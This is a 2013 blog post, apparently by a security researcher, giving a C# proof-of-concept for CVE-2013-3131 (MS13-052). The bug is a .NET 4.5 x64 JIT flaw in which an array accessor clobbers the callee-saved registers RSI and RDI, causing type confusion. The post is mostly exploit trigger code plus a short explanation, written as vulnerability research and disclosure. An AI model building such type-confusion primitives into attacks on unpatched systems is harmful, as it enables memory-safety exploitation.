# Wednesday, 10 July 2013
Type Confusion PoC for CVE-2013-3131 (MS13-052)

I did not discover this vulnerability (Alon Fliess filed the (public) bug report), but I decided to investigate it and write a PoC exploit:

```csharp
using System;
using System.Runtime.CompilerServices;

struct Foo {
  byte b1, b2, b3;
}

class U1 { }
class U2 { }

// Reference-typed locals that the JIT keeps in callee-saved registers across the call.
struct StackFields {
  internal object f1;
  internal U1 f2;
  internal U2 f3;
}

class Program {
  long field1;
  long field2;

  static void Main() {
    new Program().Get(new Foo[1, 1]);
  }

  [MethodImpl(MethodImplOptions.NoInlining)]
  object Get<T>(T[,] arr) {
    StackFields fields = new StackFields();
    fields.f1 = new U1();
    fields.f2 = new U1();
    fields.f3 = new U2();
    arr.ToString();
    // Calls the generated multi-dimensional array accessor, which clobbers RSI and RDI.
    object v = arr[0, 0];
    field2 = field1;
    // Prints whatever fields.f3 refers to after the clobbered registers are used.
    Console.WriteLine(fields.f3);
    return v;
  }
}
```

This requires .NET 4.5 x64 (and must be built/run in release mode).

The bug is that the generated array accessor clobbers the RSI and RDI registers, which are callee-saved in the x64 calling convention, so references the caller keeps in those registers are corrupted.

Wednesday, 10 July 2013 13:05:47 (W. Europe Daylight Time, UTC+02:00)